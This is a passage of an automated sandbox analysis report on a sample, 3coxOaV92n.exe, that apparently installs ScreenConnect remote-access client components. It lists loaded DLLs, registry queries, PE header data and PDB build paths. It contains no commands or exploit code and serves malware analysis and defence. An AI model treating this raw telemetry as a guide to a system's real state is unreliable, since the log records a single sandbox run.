                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: propsys.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: cryptnet.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: cabinet.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: uiautomationcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: apphelp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: dfshim.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: samlib.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Section loaded: wkscli.dll
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: 3coxOaV92n.exe Static PE information: certificate valid
                  Source: 3coxOaV92n.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: 3coxOaV92n.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: 3coxOaV92n.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: 3coxOaV92n.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: 3coxOaV92n.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: 3coxOaV92n.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: 3coxOaV92n.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: 3coxOaV92n.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A10023D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2421902019.0000000002E32000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: 3coxOaV92n.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100089000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2420666021.0000000005142000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.3285857919.0000000002411000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2474543224.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2474342978.0000000001290000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbg\ source: dfsvc.exe, 00000001.00000002.2909498559.000002A100268000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1005A4000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2423985826.000000001BE92000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.2408865216.0000000000C6D000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2909498559.000002A100268000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1005A4000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2423985826.000000001BE92000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb] source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2403366409.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2403366409.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A10023D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2421902019.0000000002E32000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100085000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2420807529.00000000051F2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: 3coxOaV92n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: 3coxOaV92n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: 3coxOaV92n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: 3coxOaV92n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: 3coxOaV92n.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.drStatic PE information: 0xBC0F508C [Tue Dec 24 14:17:48 2069 UTC]
